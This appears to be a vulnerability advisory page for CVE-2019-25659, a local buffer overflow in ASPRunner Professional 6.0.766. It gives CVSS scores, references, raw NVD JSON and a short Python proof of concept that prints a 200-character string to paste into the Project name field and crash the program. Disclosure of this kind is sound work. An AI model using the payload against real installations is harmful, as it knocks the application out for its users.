CVE-2019-25659

Description

ASPRunner Professional 6.0.766 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long project name. Attackers can paste 180 or more characters into the Project name field during project creation to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ASPRunner Professional 6.0.766

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2019-25659
# This script generates a payload to trigger the buffer overflow.
# Usage: Run the script, copy the output, and paste it into the "Project name" field in ASPRunner Professional 6.0.766.

def generate_crash_payload():
    # Vulnerability is triggered with 180+ characters
    payload = "A" * 200
    return payload

if __name__ == "__main__":
    print("[+] Generating payload for CVE-2019-25659...")
    payload = generate_crash_payload()
    print("[+] Payload generated (Length: {}):".format(len(payload)))
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25659
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25659
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25659/
[4] VulDB https://vuldb.com/cve/CVE-2019-25659
[5] http://www.xlinesoft.com/asprunnerpro
[6] https://www.exploit-db.com/exploits/46293
[7] https://www.vulncheck.com/advisories/asprunner-professional-local-buffer-overflow-dos

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25659", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:42.707", "lastModified": "2026-04-16T16:15:56.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASPRunner Professional 6.0.766 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long project name. Attackers can paste 180 or more characters into the Project name field during project creation to trigger an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.xlinesoft.com/asprunnerpro", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46293", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/asprunner-professional-local-buffer-overflow-dos", "source": "[email protected]"}]}}